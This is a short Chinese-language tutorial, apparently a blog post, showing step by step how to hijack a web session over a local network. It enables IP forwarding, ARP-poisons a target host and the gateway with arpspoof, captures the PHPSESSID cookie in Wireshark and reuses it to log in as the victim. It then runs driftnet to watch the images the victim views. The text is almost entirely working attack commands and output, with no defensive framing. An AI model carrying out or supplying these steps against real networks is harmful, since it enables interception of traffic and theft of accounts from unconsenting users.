利用arpspoof進行cookie會話劫持
1.開啟IP轉發
[email protected]:~# echo 1 > /proc/sys/net/ipv4/ip_forward
2.基本資訊
A:本機資訊
192.168.1.104
B:.靶機
192.168.1.108
C:閘道器
[email protected]:~# route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.1.1 0.0.0.0 UG 0 0 0 wlan0
192.168.1.0 * 255.255.255.0 U 0 0 0 wlan0
2.ARP毒化,向攻擊機聲稱自己(攻擊者)就是閘道器
[email protected]:~# arpspoof -i wlan0 -t 192.168.1.108 192.168.1.1
3.ARP毒化,向閘道器聲稱自己(攻擊者)就是閘道器
[email protected]:~# arpspoof -i wlan0 -t 192.168.1.1 192.168.1.108
4.wireshark抓包
圖中PHPSESSID的值是我們後續要用的
5.劫持會話
開啟相應網站,把PHPSESSID的值設定為19b924ccbdda14b0da297664904e9129,然後重新整理網頁,此時可看到已經是登入後狀態了
6.延伸:監控靶機上開啟的圖片
[email protected]:~# driftnet -i wlan0 -b -v
driftnet: using temporary file directory /tmp/drifnet-YHw0gx
driftnet: listening on wlan0 in promiscuous mode
driftnet: using filter expression `tcp'
driftnet: started display child, pid 4442
driftnet: link-level header length is 14 bytes
.driftnet: new connection: 61.155.222.133:80 -> 192.168.1.108:47590
..driftnet: new connection: 192.168.1.108:47590 -> 61.155.222.133:80
..........driftnet: new connection: 192.168.1.104:60461 -> 61.155.222.133:80
..driftnet: new connection: 61.155.222.133:80 -> 192.168.1.104:60461
............driftnet: new connection: 192.168.1.108:39835 -> 216.58.221.142:443
..........driftnet: new connection: 192.168.1.108:39836 -> 216.58.221.142:443
......................................................................driftnet: new connection: 192.168.1.108:39835 -> 216.58.221.142:443
..........driftnet: new connection: 192.168.1.108:39836 -> 216.58.221.142:443
......